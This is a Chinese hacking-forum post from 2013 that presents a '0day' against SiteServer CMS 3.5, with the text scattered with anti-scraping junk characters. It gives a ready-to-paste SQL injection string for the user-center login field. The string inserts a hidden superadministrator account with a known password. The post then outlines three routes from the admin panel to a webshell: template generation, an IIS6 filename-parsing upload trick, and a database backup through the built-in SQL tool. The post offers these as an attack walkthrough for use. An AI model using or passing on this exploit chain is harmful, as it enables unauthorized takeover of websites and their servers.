找回密码
 立即注册
查看: 2547|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版- _% r" U$ z/ u

1 `: G. F& p8 \, H' qstieserver官网:www.siteserver.cn
5 c$ D9 w5 G0 {! b( T' b& L6 U" p* K$ J

" V" h7 Q. h0 X. l2 i/ f. [/ n/ \% X8 t: \( o9 r. e
EXP:
' M3 a* Z2 a3 |0 O* G2 E
. |9 R/ l! x7 m: k: E" A" Q直接访问UserCenter/login.aspx5 C; \7 ^( Z6 |8 v2 ]& s3 Y  F
. Q1 ~' \1 r' k' E6 z' X( J

9 U* E% N4 `2 B: z) i0 `1 v1 {0 N2 d7 @
用户名处输入:6 F! W/ X0 f$ z) C0 J

8 k* H& y0 w, F: Q3 u123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
( Y1 m6 B& w5 f( ?
$ L6 L% Y8 {$ _; f" o& p
' m/ n3 `# i2 R
) W. w* e( h. U0 j密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。/ {' [4 d. \2 Y5 Z. x  ]. D

; m  c% e# q! Y" h$ D  {# g/ B# I
; `5 k* V: }& w
2 [; _) P: l. d$ f+ N7 Q之后再访问后台SiteServer/login.aspx用插入的用户登陆
; Y5 V/ _5 O9 v& M* s# P! O- p; N+ h& K4 b9 o6 I6 ]+ r

9 Q. l/ o* i% l5 W* T+ D
% k9 h7 I' Q" g9 i后台拿webshell的三种方法:7 [$ ?  d) _, Q

& a) l' v, S# k7 D$ H! M一、: B- q1 \6 _0 C1 q1 S' f

4 j: F7 ?8 a+ t! E8 A站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
1 V% W" Y8 M' Z3 o' Z+ x0 R! N
+ b# c# o) B; h6 t二、! W0 V" m4 w3 I- D

2 ]7 [! a# k9 q- z5 `; ?成员权限-》添加用户-》用户名为:1.asp; b# c4 S2 v0 [0 M0 C1 y

1 v9 Y! ^& k5 |& h2 m0 I% Nhttp://127.0.0.1/usercenter/1 {- {& Q9 `0 v5 V4 i4 @6 `
( y) o% v/ y/ d0 d" H
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell. u! t0 n7 ]5 \: n

% b! f1 Y# l/ o4 ^: ]" O2 _1 X" N(ps:后台添加用户时不会验证是否含有非法字符)
/ c# }/ b8 n# N$ Y1 @* w! f+ T" k: T( a7 [. P. l
三、
7 Y( T; [6 ^9 r: g
* h5 _0 l) ^6 j& y4 C$ E3 C系统工具-》实用工具-》机器参数查看3 @2 O* b# C% [" c! ~+ f
可以看到数据库类型、名称,WEB路径
$ E5 H, d  |/ S4 l1 ^9 C$ ]- G6 e' u' {: v' m1 ^' C' `/ \, J
系统工具-》数据库工具-》SQL语句查询& N7 n5 P6 |  q7 U
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
! \+ U4 F  m! a( f# Z* V1 \* F
; v0 B# c# H" d) _% E3 O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表